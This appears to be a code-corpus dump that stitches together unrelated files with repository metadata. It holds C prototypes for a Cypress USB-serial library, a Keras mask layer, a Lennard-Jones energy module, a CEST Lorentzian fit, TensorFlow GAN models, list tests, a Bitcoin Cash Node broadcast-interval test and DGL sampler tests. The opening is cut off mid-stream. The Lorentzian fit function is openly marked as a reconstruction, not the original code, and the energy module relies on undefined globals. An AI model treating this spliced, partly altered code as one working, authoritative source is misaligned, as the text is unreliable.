CY_RETURN_STATUS CyGetGpioValue (
CY_HANDLE handle,
UINT8 gpioNumber,
UINT8 *value
);
CY_RETURN_STATUS CySetEventNotification(
CY_HANDLE handle,
CY_EVENT_NOTIFICATION_CB_FN notificationCbFn
);
CY_RETURN_STATUS CyAbortEventNotification(
CY_HANDLE handle
);
CY_RETURN_STATUS CyGetLibraryVersion (
CY_HANDLE handle,
PCY_LIBRARY_VERSION version
);
CY_RETURN_STATUS CyGetFirmwareVersion (
CY_HANDLE handle,
PCY_FIRMWARE_VERSION firmwareVersion
);
CY_RETURN_STATUS CyResetDevice (
CY_HANDLE handle
);
CY_RETURN_STATUS CyProgUserFlash (
CY_HANDLE handle,
CY_DATA_BUFFER *progBuffer,
UINT32 flashAddress,
UINT32 timeout
);
CY_RETURN_STATUS CyReadUserFlash (
CY_HANDLE handle,
CY_DATA_BUFFER *readBuffer,
UINT32 flashAddress,
UINT32 timeout
);
CY_RETURN_STATUS CyGetSignature (
CY_HANDLE handle,
UCHAR *pSignature
);
CY_RETURN_STATUS CyGetUartConfig (
CY_HANDLE handle,
CY_UART_CONFIG *uartConfig
);
CY_RETURN_STATUS CySetUartConfig (
CY_HANDLE handle,
CY_UART_CONFIG *uartConfig
);
CY_RETURN_STATUS CyUartRead (
CY_HANDLE handle,
CY_DATA_BUFFER* readBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyUartWrite (
CY_HANDLE handle,
CY_DATA_BUFFER* writeBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyUartSetHwFlowControl(
CY_HANDLE handle,
CY_FLOW_CONTROL_MODES mode
);
CY_RETURN_STATUS CyUartGetHwFlowControl(
CY_HANDLE handle,
CY_FLOW_CONTROL_MODES *mode
);
CY_RETURN_STATUS CyUartSetRts(
CY_HANDLE handle
);
CY_RETURN_STATUS CyUartClearRts(
CY_HANDLE handle
);
CY_RETURN_STATUS CyUartSetDtr(
CY_HANDLE handle
);
CY_RETURN_STATUS CyUartClearDtr(
CY_HANDLE handle
);
CY_RETURN_STATUS CyUartSetBreak(
CY_HANDLE handle,
UINT16 timeout
);
CY_RETURN_STATUS CyGetI2cConfig (
CY_HANDLE handle,
CY_I2C_CONFIG *i2cConfig
);
CY_RETURN_STATUS CySetI2cConfig (
CY_HANDLE handle,
CY_I2C_CONFIG *i2cConfig
);
CY_RETURN_STATUS CyI2cRead (
CY_HANDLE handle,
CY_I2C_DATA_CONFIG *dataConfig,
CY_DATA_BUFFER *readBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyI2cWrite (
CY_HANDLE handle,
CY_I2C_DATA_CONFIG *dataConfig,
CY_DATA_BUFFER *writeBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyI2cReset(
CY_HANDLE handle,
BOOL resetMode
);
CY_RETURN_STATUS CyGetSpiConfig (
CY_HANDLE handle,
CY_SPI_CONFIG *spiConfig
);
CY_RETURN_STATUS CySetSpiConfig (
CY_HANDLE handle,
CY_SPI_CONFIG *spiConfig
);
CY_RETURN_STATUS CySpiReadWrite (
CY_HANDLE handle,
CY_DATA_BUFFER* readBuffer,
CY_DATA_BUFFER* writeBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyJtagEnable (
CY_HANDLE handle
);
CY_RETURN_STATUS CyJtagDisable (
CY_HANDLE handle
);
CY_RETURN_STATUS CyJtagWrite (
CY_HANDLE handle,
CY_DATA_BUFFER *writeBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyJtagRead (
CY_HANDLE handle,
CY_DATA_BUFFER *readBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyPhdcClrFeature (
CY_HANDLE handle
);
CY_RETURN_STATUS CyPhdcSetFeature (
CY_HANDLE handle
);
CY_RETURN_STATUS CyPhdcGetStatus (
CY_HANDLE handle,
UINT16 *dataStatus
);
"""
| 1.484375 | 1 |
deep_qa/layers/wrappers/output_mask.py | richarajpal/deep_qa | 459 | 6962 | <reponame>richarajpal/deep_qa
from overrides import overrides
from ..masked_layer import MaskedLayer
class OutputMask(MaskedLayer):
"""
This Layer is purely for debugging. You can wrap this on a layer's output to get the mask
output by that layer as a model output, for easier visualization of what the model is actually
doing.
Don't try to use this in an actual model.
"""
@overrides
def compute_mask(self, inputs, mask=None):
return None
@overrides
def call(self, inputs, mask=None): # pylint: disable=unused-argument
return mask
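# Minimal usage sketch (assumption: the standard Keras functional API; the layer and tensor
# names below are hypothetical, and this is meant for debugging only, as the docstring warns):
#
#   masked_output = SomeMaskedLayer()(inputs)      # any layer that produces a mask
#   mask = OutputMask()(masked_output)             # expose that mask as a model output
#   model = Model(inputs=inputs, outputs=[masked_output, mask])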
| 3.109375 | 3 |
ljmc/energy.py | karnesh/Monte-Carlo-LJ | 0 | 6963 | """
energy.py
Functions that compute the inter-particle energy
using a truncated 12-6 Lennard-Jones potential.
All the variables are in reduced units.
"""
def distance(atom1, atom2):
"""
Computes the square of inter particle distance
Minimum image convention is applied for distance calculation for periodic boundary conditions
"""
dx = atom1.x - atom2.x
dy = atom1.y - atom2.y
dz = atom1.z - atom2.z
    if dx > halfLx:
dx -= Lx
elif dx < -halfLx:
dx += Lx
if dy > halfLy:
dy -= Ly
elif dy < -halfLy:
dy += Ly
if dz > halfLz:
dz -= Lz
elif dz < -halfLz:
dz += Lz
return dx**2 + dy**2 + dz**2
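# Note: the wrapping above is the minimum image convention; an equivalent one-liner per axis
# would be dx -= Lx * round(dx / Lx). The box lengths (Lx, Ly, Lz) and their halves
# (halfLx, halfLy, halfLz) are assumed to be module-level globals defined elsewhere.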
def energy(atom1, atom2, rc):
'''
    Calculates the truncated Lennard-Jones interaction energy between a pair of particles.
'''
## Arithmatic mixing rules - Lorentz Berthlot mixing
eps = (atom1.eps + atom2.eps)/2
sig = (atom1.sigma * atom2.sigma)**0.5
rcsq = rc**2
rsq = distance(atom1, atom2)
    if rsq <= rcsq:
        energy = 4.0*eps*( (sig**2/rsq)**6.0 - (sig**2/rsq)**3.0)
    else:
        energy = 0.0
    return energy
def writeEnergy(step, energy):
'''
Writes the energy to a file.
'''
with open('energy.dat', 'a') as f:
f.write('{0} {1}\n'.format(step, energy))
| 3.4375 | 3 |
CEST/Evaluation/lorenzian.py | ludgerradke/bMRI | 0 | 6964 | import numpy as np
import math
from scipy.optimize import curve_fit
def calc_lorentzian(CestCurveS, x_calcentires, mask, config):
(rows, colums, z_slices, entires) = CestCurveS.shape
lorenzian = {key: np.zeros((rows, colums, z_slices), dtype=float) for key in config.lorenzian_keys}
for k in range(z_slices):
for i in range(rows):
for j in range(colums):
if mask[i, j, k] != 0:
params = calc_lorenzian_pixel(CestCurveS[i, j, k, :], x_calcentires, config.Lorenzian['MT_f'],
config.Lorenzian['NOE1_f'], config.Lorenzian['NOE2_f'],
config.Lorenzian['OH_f'], config.Lorenzian['NH_f'])
if params is None:
continue
dic = {
'OH_a': params[3],
'OH_w': params[4],
'NH_a': params[5],
'NH_w': params[6],
'NOE1_a': params[7],
'NOE1_w': params[8],
'NOE2_a': params[9],
'NOE2_w': params[10],
'MT_a': params[11],
'MT_w': params[12],
}
for key in config.lorenzian_keys:
lorenzian[key][i, j, k] = dic[key]
return lorenzian
def calc_lorenzian_pixel(values, x_calcentires, MT_f, NOE1_f, NOE2_f, OH_f, NH_f):
    # wassr_offset = 0 here, since the Z-spectra were already corrected beforehand
fit = lorenz_like_matlab(wassr_offset=0, MT_f=MT_f, NOE1_f=NOE1_f, NOE2_f=NOE2_f, OH_f=OH_f, NH_f=NH_f)
try:
param, param_cov = curve_fit(fit, x_calcentires, values, bounds=([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10,
10]))
except RuntimeError:
param = None
return param
def lorenz_like_matlab(wassr_offset, MT_f: float = - 2.43, NOE1_f: float = - 1, NOE2_f: float = - 2.6,
                       OH_f: float = + 1.4, NH_f: float = + 3.2):
    # X_f = frequency (ppm offset) of pool X. Reconstructed fit model (assumption, not the original
    # author's exact code): constant plus water pool minus the five CEST/MT pools, i.e. 13 parameters
    # in the order expected by calc_lorenzian_pixel above.
    def fit(x, a, b, ak, OH_a, OH_w, NH_a, NH_w, NOE1_a, NOE1_w, NOE2_a, NOE2_w, MT_a, MT_w):
        water = a * ((b ** 2) / 4) / (((b ** 2) / 4) + (x - wassr_offset) ** 2)
        pools = (one_lorenz(x, OH_a, OH_w, wassr_offset, OH_f) + one_lorenz(x, NH_a, NH_w, wassr_offset, NH_f)
                 + one_lorenz(x, NOE1_a, NOE1_w, wassr_offset, NOE1_f) + one_lorenz(x, NOE2_a, NOE2_w, wassr_offset, NOE2_f)
                 + one_lorenz(x, MT_a, MT_w, wassr_offset, MT_f))
        return (a + ak) - (water + pools)
    return fit
def one_lorenz(x, amplitude, width, wassr_offset, frequenz):
return amplitude * ((width ** 2) / 4) / (((width ** 2) / 4) + (x - (wassr_offset + frequenz)) ** 2)
| 2.140625 | 2 |
components/network_models_LSTU.py | neuralchen/CooGAN | 12 | 6965 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
#############################################################
# File: network_models_LSTU.py
# Created Date: Tuesday February 25th 2020
# Author: <NAME>
# Email: <EMAIL>
# Last Modified: Tuesday, 25th February 2020 9:57:06 pm
# Modified By: <NAME>
# Copyright (c) 2020 Shanghai Jiao Tong University
#############################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from functools import partial
import tensorflow as tf
import tensorflow.contrib.slim as slim
import tflib as tl
conv = partial(slim.conv2d, activation_fn=None)
dconv = partial(slim.conv2d_transpose, activation_fn=None)
fc = partial(tl.flatten_fully_connected, activation_fn=None)
relu = tf.nn.relu
lrelu = tf.nn.leaky_relu
sigmoid = tf.nn.sigmoid
tanh = tf.nn.tanh
batch_norm = partial(slim.batch_norm, scale=True, updates_collections=None)
instance_norm = slim.instance_norm
MAX_DIM = 64 * 16
def Genc(x, dim=64, n_layers=5, multi_inputs=1, is_training=True):
bn = partial(batch_norm, is_training=is_training)
conv_bn_lrelu = partial(conv, normalizer_fn=bn, activation_fn=lrelu)
with tf.variable_scope('Genc', reuse=tf.AUTO_REUSE):
h, w = x.shape[1:3]
z = x
zs = []
for i in range(n_layers):
d = min(dim * 2**i, MAX_DIM)
if multi_inputs > i and i > 0:
z = tf.concat([z, tf.image.resize_bicubic(x, (h//(2**i), w//(2**i)))], 3)
z = conv_bn_lrelu(z, d, 4, 2)
zs.append(z)
return zs
def LSTU(in_data, state, out_channel, is_training=True, kernel_size=3, norm='none', pass_state='lstate'):
if norm == 'bn':
norm_fn = partial(batch_norm, is_training=is_training)
elif norm == 'in':
norm_fn = instance_norm
else:
norm_fn = None
gate = partial(conv, normalizer_fn=norm_fn, activation_fn=sigmoid)
info = partial(conv, normalizer_fn=norm_fn, activation_fn=tanh)
with tf.name_scope('ConvGRUCell'):
state_ = dconv(state, out_channel, 4, 2) # upsample and make `channel` identical to `out_channel`
reset_gate = gate(tf.concat([in_data, state_], axis=3), 1, kernel_size)
update_gate = gate(tf.concat([in_data, state_], axis=3), 1, kernel_size)
new_state = reset_gate * state_
new_info = info(tf.concat([in_data, new_state], axis=3), out_channel, kernel_size)
output = (1-update_gate)*state_ + update_gate*new_info
if pass_state == 'gru':
return output, output
elif pass_state == 'direct':
return output, state_
else: # 'stu'
return output, new_state
# state_hat = dconv(old_state, outdim, 4, 2)
# tmp_concat= _concat(x, state_hat, None)
# channelpool1=tf.concat([tf.reduce_max(tmp_concat,3,True), tf.reduce_mean(tmp_concat,3,True)], axis=3)
# r_channel=conv(channelpool1,1,7,1,normalizer_fn=None,activation_fn=sigmoid)
# new_state = r_channel * state_hat
# tmp_concat= _concat(x, new_state, None)
# hidden_info = conv(tmp_concat,outdim,3,1,normalizer_fn=None,activation_fn=tanh)
# tmp_concat= _concat(x, state_hat, None)
# channelpool2=tf.concat([tf.reduce_max(tmp_concat,3,True), tf.reduce_mean(tmp_concat,3,True)], axis=3)
# z=conv(channelpool2,1,7,1,normalizer_fn=None,activation_fn=sigmoid)
# output =z *hidden_info +(1-z)*state_hat
# return output,new_state
def Gstu(zs, _a, dim=64, n_layers=1, inject_layers=0, is_training=True, kernel_size=3, norm='none', pass_state='stu'):
def _concat(z, z_, _a):
feats = [z]
if z_ is not None:
feats.append(z_)
if _a is not None:
_a = tf.reshape(_a, [-1, 1, 1, tl.shape(_a)[-1]])
_a = tf.tile(_a, [1, tl.shape(z)[1], tl.shape(z)[2], 1])
feats.append(_a)
return tf.concat(feats, axis=3)
with tf.variable_scope('Gstu', reuse=tf.AUTO_REUSE):
zs_ = [zs[-1]]
state = _concat(zs[-1], None, _a)
for i in range(n_layers): # n_layers <= 4
d = min(dim * 2**(n_layers - 1 - i), MAX_DIM)
output = LSTU(zs[n_layers - 1 - i],state,d,is_training=is_training,
kernel_size=kernel_size, norm=norm, pass_state=pass_state)
zs_.insert(0, output[0])
if inject_layers > i:
state = _concat(output[1], None, _a)
else:
state = output[1]
return zs_
def Gdec(zs, _a, dim=64, n_layers=5, shortcut_layers=1, inject_layers=0, is_training=True, one_more_conv=0):
bn = partial(batch_norm, is_training=is_training)
dconv_bn_relu = partial(dconv, normalizer_fn=bn, activation_fn=relu)
shortcut_layers = min(shortcut_layers, n_layers - 1)
inject_layers = min(inject_layers, n_layers - 1)
def _concat(z, z_, _a):
feats = [z]
if z_ is not None:
feats.append(z_)
if _a is not None:
_a = tf.reshape(_a, [-1, 1, 1, tl.shape(_a)[-1]])
_a = tf.tile(_a, [1, tl.shape(z)[1], tl.shape(z)[2], 1])
feats.append(_a)
return tf.concat(feats, axis=3)
with tf.variable_scope('Gdec', reuse=tf.AUTO_REUSE):
z = _concat(zs[-1], None, _a)
for i in range(n_layers):
if i < n_layers - 1:
d = min(dim * 2**(n_layers - 1 - i), MAX_DIM)
z = dconv_bn_relu(z, d, 4, 2)
if shortcut_layers > i:
z = _concat(z, zs[n_layers - 2 - i], None)
if inject_layers > i:
z = _concat(z, None, _a)
else:
if one_more_conv: # add one more conv after the decoder
z = dconv_bn_relu(z, dim//4, 4, 2)
x = tf.nn.tanh(dconv(z, 3, one_more_conv))
else:
x = z = tf.nn.tanh(dconv(z, 3, 4, 2))
return x
def D(x, n_att, dim=64, fc_dim=MAX_DIM, n_layers=5):
conv_in_lrelu = partial(conv, normalizer_fn=instance_norm, activation_fn=lrelu)
with tf.variable_scope('D', reuse=tf.AUTO_REUSE):
y = x
for i in range(n_layers):
d = min(dim * 2**i, MAX_DIM)
y = conv_in_lrelu(y, d, 4, 2)
logit_gan = lrelu(fc(y, fc_dim))
logit_gan = fc(logit_gan, 1)
logit_att = lrelu(fc(y, fc_dim))
logit_att = fc(logit_att, n_att)
return logit_gan, logit_att
def gradient_penalty(f, real, fake=None):
def _interpolate(a, b=None):
with tf.name_scope('interpolate'):
if b is None: # interpolation in DRAGAN
beta = tf.random_uniform(shape=tf.shape(a), minval=0., maxval=1.)
_, variance = tf.nn.moments(a, range(a.shape.ndims))
b = a + 0.5 * tf.sqrt(variance) * beta
shape = [tf.shape(a)[0]] + [1] * (a.shape.ndims - 1)
alpha = tf.random_uniform(shape=shape, minval=0., maxval=1.)
inter = a + alpha * (b - a)
inter.set_shape(a.get_shape().as_list())
return inter
with tf.name_scope('gradient_penalty'):
x = _interpolate(real, fake)
pred = f(x)
if isinstance(pred, tuple):
pred = pred[0]
grad = tf.gradients(pred, x)[0]
norm = tf.norm(slim.flatten(grad), axis=1)
gp = tf.reduce_mean((norm - 1.)**2)
return gp
| 2.109375 | 2 |
slender/tests/list/test_keep_if.py | torokmark/slender | 1 | 6966 | <reponame>torokmark/slender
from unittest import TestCase
from expects import expect, equal, raise_error
from slender import List
class TestKeepIf(TestCase):
def test_keep_if_if_func_is_none(self):
e = List([1, 2, 3, 4, 5])
expect(e.keep_if(None).to_list()).to(equal([1, 2, 3, 4, 5]))
def test_keep_if_if_func_is_valid(self):
e = List([1, 2, 3, 4, 5])
expect(e.keep_if(lambda item: item > 3).to_list()).to(equal([4, 5]))
def test_keep_if_if_func_is_invalid_for_all_items(self):
e = List([1, 2, 3, 4, 5])
expect(e.keep_if(lambda item: item > 6).to_list()).to(equal([]))
def test_keep_if_if_func_is_different(self):
e = List([1, 2, 3, 4])
expect(lambda: e.keep_if('...')).to(raise_error(TypeError))
| 2.6875 | 3 |
test/functional/bchn-txbroadcastinterval.py | 1Crazymoney/bitcoin-cash-node | 1 | 6967 | <filename>test/functional/bchn-txbroadcastinterval.py
#!/usr/bin/env python3
# Copyright (c) 2020 The Bitcoin Cash Node developers
# Author matricz
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Test that inv messages are sent according to
an exponential distribution with scale -txbroadcastinterval
The outbound interval should be half of the inbound
"""
import time
from test_framework.mininode import P2PInterface, mininode_lock
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import wait_until, connect_nodes, disconnect_nodes
from scipy import stats
class InvReceiver(P2PInterface):
def __init__(self):
super().__init__()
self.invTimes = []
self.invDelays = []
def on_inv(self, message):
timeArrived = time.time()
        # If an inv contains more than one transaction, then the number of invs (==samplesize)
# will be non-deterministic. This would be an error.
assert(len(message.inv) == 1)
self.invTimes.append(timeArrived)
if len(self.invTimes) > 1:
timediff = self.invTimes[-1] - self.invTimes[-2]
self.invDelays.append(timediff)
class TxBroadcastIntervalTest(BitcoinTestFramework):
# This test will have a node create a number of transactions and relay them
# to the mininode InvReceivers (one inbound and one outbound)
# according to test parameters.
# A third disconnected node is used only to create signed transactions
# The nodes are configured with "-txbroadcastrate=1" and
# "-excessiveblocksize=2000000" so that they relay at most one tx per inv
# It's convenient, because we can now define the exact number of invs
# (== sample size -1) that we want to send
# This holds true only for interval values <= 500 ms
# The mininode InvReceiver just listens and registers the delays between invs
# and constructs a sample array from these delays
# This sample is tested against a reference exponential distribution
# density with the same parameters with scipy.stats.kstest
# (See https://en.wikipedia.org/wiki/Kolmogorov%E2%80%93Smirnov_test)
# The test is accepted if the delays sample resembles the reference
    # distribution -- or, more specifically, if the probability that the
    # observed delays could have arisen as a sample from the theoretical
    # exponential distribution is at least alpha
    # (pvalue > alpha, default 0.001)
# There is one mininode that connects directly to the node that generates transactions.
# This tests the *inbound* connection interval.
# The first node creates an outbound connection to the second node,
# which relays the transactions instantly (-txbroadcastinterval=1)
# to the second mininode, which tests the *outbound* connection interval (= 1/2 of the inbound).
# (but is less reliable for small values of the -txbroadcastinterval)
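    # Illustrative summary of the check performed in run_test() below (added comment):
    #   scale = interval_ms / 1000            # mean of the reference exponential
    #   stats.kstest(delays, stats.expon(scale=scale).cdf).pvalue > alpha
    # i.e. the test only fails when the observed inter-inv delays are very unlikely
    # to be a sample from the reference exponential distribution.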
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument("--interval", dest="interval", type=int, default=500,
help="Set the average send interval in ms")
parser.add_argument("--samplesize", dest="samplesize", type=int, default=100,
help="Set the samplesize (number of inv message delays) for testing")
parser.add_argument("--testoutbound", dest="testoutbound", action="store_true",
help="Set whether to test outbound (along inbound) connection interval")
parser.add_argument("--alpha", dest="alpha", type=float, default="0.001",
help="Set a confidence threshold for the kstest")
def set_test_params(self):
self.scale = self.options.interval / 1000
self.num_nodes = 3
args = [
["-txbroadcastinterval={}".format(self.options.interval),
"-txbroadcastrate=1", "-excessiveblocksize=2000000",
"-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)],
["-txbroadcastinterval=1",
"-txbroadcastrate=1", "-excessiveblocksize=2000000",
"-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)],
["-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)]
]
self.extra_args = args
def setup_network(self):
self.setup_nodes()
connect_nodes(self.nodes[0], self.nodes[1])
connect_nodes(self.nodes[1], self.nodes[2])
# Generate enough coins on the spending nodes
self.nodes[2].generate(20 + 100)
self.sync_all()
# Disconnect node 3 so that it doesn't broadcast the txs it creates
disconnect_nodes(self.nodes[1], self.nodes[2])
self.signedtxs = []
to = self.nodes[2].getnewaddress()
for i in range(self.options.samplesize):
txid = self.nodes[2].sendtoaddress(to, "0.00001", "comment", "comment_to", False, 2)
self.signedtxs.append(self.nodes[2].gettransaction(txid)['hex'])
def run_test(self):
inboundReceiver, outboundReceiver = InvReceiver(), InvReceiver()
self.nodes[0].add_p2p_connection(inboundReceiver)
self.nodes[1].add_p2p_connection(outboundReceiver)
for signextx in self.signedtxs:
self.nodes[0].sendrawtransaction(signextx, True)
wait_until(
lambda: len(inboundReceiver.invTimes) == self.options.samplesize,
lock=mininode_lock,
timeout=self.options.samplesize * self.options.interval / 1000 * 2)
wait_until(
lambda: len(outboundReceiver.invTimes) == self.options.samplesize,
lock=mininode_lock,
timeout=self.options.samplesize * self.options.interval / 1000)
inboundkstestresult = stats.kstest(inboundReceiver.invDelays, stats.expon(scale=self.scale).cdf)
outboundkstestresult = stats.kstest(outboundReceiver.invDelays, stats.expon(scale=self.scale / 2).cdf)
self.log.info("kstestresults for interval {}: inbound {}, outbound {}".format(
self.options.interval,
inboundkstestresult,
outboundkstestresult))
assert(inboundkstestresult.pvalue > self.options.alpha), inboundReceiver.invDelays
if self.options.testoutbound:
assert(outboundkstestresult.pvalue > self.options.alpha), outboundReceiver.invDelays
if __name__ == '__main__':
TxBroadcastIntervalTest().main()
| 2.3125 | 2 |
tests/compute/test_sampler.py | buaaqt/dgl | 1 | 6968 | import backend as F
import numpy as np
import scipy as sp
import dgl
from dgl import utils
import unittest
from numpy.testing import assert_array_equal
np.random.seed(42)
def generate_rand_graph(n):
arr = (sp.sparse.random(n, n, density=0.1, format='coo') != 0).astype(np.int64)
return dgl.DGLGraph(arr, readonly=True)
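# Note (added comment): generate_rand_graph() builds a read-only DGLGraph from a random
# sparse 0/1 adjacency matrix with ~10% edge density; it is reused by all tests below.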
def test_create_full():
g = generate_rand_graph(100)
full_nf = dgl.contrib.sampling.sampler.create_full_nodeflow(g, 5)
assert full_nf.number_of_nodes() == g.number_of_nodes() * 6
assert full_nf.number_of_edges() == g.number_of_edges() * 5
def test_1neighbor_sampler_all():
g = generate_rand_graph(100)
# In this case, NeighborSampling simply gets the neighborhood of a single vertex.
for i, subg in enumerate(dgl.contrib.sampling.NeighborSampler(
g, 1, g.number_of_nodes(), neighbor_type='in', num_workers=4)):
seed_ids = subg.layer_parent_nid(-1)
assert len(seed_ids) == 1
src, dst, eid = g.in_edges(seed_ids, form='all')
assert subg.number_of_nodes() == len(src) + 1
assert subg.number_of_edges() == len(src)
assert seed_ids == subg.layer_parent_nid(-1)
child_src, child_dst, child_eid = subg.in_edges(subg.layer_nid(-1), form='all')
assert F.array_equal(child_src, subg.layer_nid(0))
src1 = subg.map_to_parent_nid(child_src)
assert F.array_equal(src1, src)
def is_sorted(arr):
return np.sum(np.sort(arr) == arr, 0) == len(arr)
def verify_subgraph(g, subg, seed_id):
seed_id = F.asnumpy(seed_id)
seeds = F.asnumpy(subg.map_to_parent_nid(subg.layer_nid(-1)))
assert seed_id in seeds
child_seed = F.asnumpy(subg.layer_nid(-1))[seeds == seed_id]
src, dst, eid = g.in_edges(seed_id, form='all')
child_src, child_dst, child_eid = subg.in_edges(child_seed, form='all')
child_src = F.asnumpy(child_src)
# We don't allow duplicate elements in the neighbor list.
assert(len(np.unique(child_src)) == len(child_src))
# The neighbor list also needs to be sorted.
assert(is_sorted(child_src))
# a neighbor in the subgraph must also exist in parent graph.
src = F.asnumpy(src)
for i in subg.map_to_parent_nid(child_src):
assert F.asnumpy(i) in src
def test_1neighbor_sampler():
g = generate_rand_graph(100)
# In this case, NeighborSampling simply gets the neighborhood of a single vertex.
for subg in dgl.contrib.sampling.NeighborSampler(g, 1, 5, neighbor_type='in',
num_workers=4):
seed_ids = subg.layer_parent_nid(-1)
assert len(seed_ids) == 1
assert subg.number_of_nodes() <= 6
assert subg.number_of_edges() <= 5
verify_subgraph(g, subg, seed_ids)
def test_prefetch_neighbor_sampler():
g = generate_rand_graph(100)
# In this case, NeighborSampling simply gets the neighborhood of a single vertex.
for subg in dgl.contrib.sampling.NeighborSampler(g, 1, 5, neighbor_type='in',
num_workers=4, prefetch=True):
seed_ids = subg.layer_parent_nid(-1)
assert len(seed_ids) == 1
assert subg.number_of_nodes() <= 6
assert subg.number_of_edges() <= 5
verify_subgraph(g, subg, seed_ids)
def test_10neighbor_sampler_all():
g = generate_rand_graph(100)
# In this case, NeighborSampling simply gets the neighborhood of a single vertex.
for subg in dgl.contrib.sampling.NeighborSampler(g, 10, g.number_of_nodes(),
neighbor_type='in', num_workers=4):
seed_ids = subg.layer_parent_nid(-1)
assert F.array_equal(seed_ids, subg.map_to_parent_nid(subg.layer_nid(-1)))
src, dst, eid = g.in_edges(seed_ids, form='all')
child_src, child_dst, child_eid = subg.in_edges(subg.layer_nid(-1), form='all')
src1 = subg.map_to_parent_nid(child_src)
assert F.array_equal(src1, src)
def check_10neighbor_sampler(g, seeds):
# In this case, NeighborSampling simply gets the neighborhood of a single vertex.
for subg in dgl.contrib.sampling.NeighborSampler(g, 10, 5, neighbor_type='in',
num_workers=4, seed_nodes=seeds):
seed_ids = subg.layer_parent_nid(-1)
assert subg.number_of_nodes() <= 6 * len(seed_ids)
assert subg.number_of_edges() <= 5 * len(seed_ids)
for seed_id in seed_ids:
verify_subgraph(g, subg, seed_id)
def test_10neighbor_sampler():
g = generate_rand_graph(100)
check_10neighbor_sampler(g, None)
check_10neighbor_sampler(g, seeds=np.unique(np.random.randint(0, g.number_of_nodes(),
size=int(g.number_of_nodes() / 10))))
def _test_layer_sampler(prefetch=False):
g = generate_rand_graph(100)
nid = g.nodes()
src, dst, eid = g.all_edges(form='all', order='eid')
n_batches = 5
batch_size = 50
seed_batches = [np.sort(np.random.choice(F.asnumpy(nid), batch_size, replace=False))
for i in range(n_batches)]
seed_nodes = np.hstack(seed_batches)
layer_sizes = [50] * 3
LayerSampler = getattr(dgl.contrib.sampling, 'LayerSampler')
sampler = LayerSampler(g, batch_size, layer_sizes, 'in',
seed_nodes=seed_nodes, num_workers=4, prefetch=prefetch)
for sub_g in sampler:
assert all(sub_g.layer_size(i) < size for i, size in enumerate(layer_sizes))
sub_nid = F.arange(0, sub_g.number_of_nodes())
assert all(np.all(np.isin(F.asnumpy(sub_g.layer_nid(i)), F.asnumpy(sub_nid)))
for i in range(sub_g.num_layers))
assert np.all(np.isin(F.asnumpy(sub_g.map_to_parent_nid(sub_nid)),
F.asnumpy(nid)))
sub_eid = F.arange(0, sub_g.number_of_edges())
assert np.all(np.isin(F.asnumpy(sub_g.map_to_parent_eid(sub_eid)),
F.asnumpy(eid)))
assert any(np.all(np.sort(F.asnumpy(sub_g.layer_parent_nid(-1))) == seed_batch)
for seed_batch in seed_batches)
sub_src, sub_dst = sub_g.all_edges(order='eid')
for i in range(sub_g.num_blocks):
block_eid = sub_g.block_eid(i)
block_src = sub_g.map_to_parent_nid(F.gather_row(sub_src, block_eid))
block_dst = sub_g.map_to_parent_nid(F.gather_row(sub_dst, block_eid))
block_parent_eid = sub_g.block_parent_eid(i)
block_parent_src = F.gather_row(src, block_parent_eid)
block_parent_dst = F.gather_row(dst, block_parent_eid)
assert np.all(F.asnumpy(block_src == block_parent_src))
n_layers = sub_g.num_layers
sub_n = sub_g.number_of_nodes()
assert sum(F.shape(sub_g.layer_nid(i))[0] for i in range(n_layers)) == sub_n
n_blocks = sub_g.num_blocks
sub_m = sub_g.number_of_edges()
assert sum(F.shape(sub_g.block_eid(i))[0] for i in range(n_blocks)) == sub_m
def test_layer_sampler():
_test_layer_sampler()
_test_layer_sampler(prefetch=True)
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="Error occurred when multiprocessing")
def test_nonuniform_neighbor_sampler():
# Construct a graph with
# (1) A path (0, 1, ..., 99) with weight 1
# (2) A bunch of random edges with weight 0.
edges = []
for i in range(99):
edges.append((i, i + 1))
for i in range(1000):
edge = (np.random.randint(100), np.random.randint(100))
if edge not in edges:
edges.append(edge)
src, dst = zip(*edges)
g = dgl.DGLGraph()
g.add_nodes(100)
g.add_edges(src, dst)
g.readonly()
g.edata['w'] = F.cat([
F.ones((99,), F.float64, F.cpu()),
F.zeros((len(edges) - 99,), F.float64, F.cpu())], 0)
# Test 1-neighbor NodeFlow with 99 as target node.
# The generated NodeFlow should only contain node i on layer i.
sampler = dgl.contrib.sampling.NeighborSampler(
g, 1, 1, 99, 'in', transition_prob='w', seed_nodes=[99])
nf = next(iter(sampler))
assert nf.num_layers == 100
for i in range(nf.num_layers):
assert nf.layer_size(i) == 1
assert F.asnumpy(nf.layer_parent_nid(i)[0]) == i
# Test the reverse direction
sampler = dgl.contrib.sampling.NeighborSampler(
g, 1, 1, 99, 'out', transition_prob='w', seed_nodes=[0])
nf = next(iter(sampler))
assert nf.num_layers == 100
for i in range(nf.num_layers):
assert nf.layer_size(i) == 1
assert F.asnumpy(nf.layer_parent_nid(i)[0]) == 99 - i
def test_setseed():
g = generate_rand_graph(100)
nids = []
dgl.random.seed(42)
for subg in dgl.contrib.sampling.NeighborSampler(
g, 5, 3, num_hops=2, neighbor_type='in', num_workers=1):
nids.append(
tuple(tuple(F.asnumpy(subg.layer_parent_nid(i))) for i in range(3)))
# reinitialize
dgl.random.seed(42)
for i, subg in enumerate(dgl.contrib.sampling.NeighborSampler(
g, 5, 3, num_hops=2, neighbor_type='in', num_workers=1)):
item = tuple(tuple(F.asnumpy(subg.layer_parent_nid(i))) for i in range(3))
assert item == nids[i]
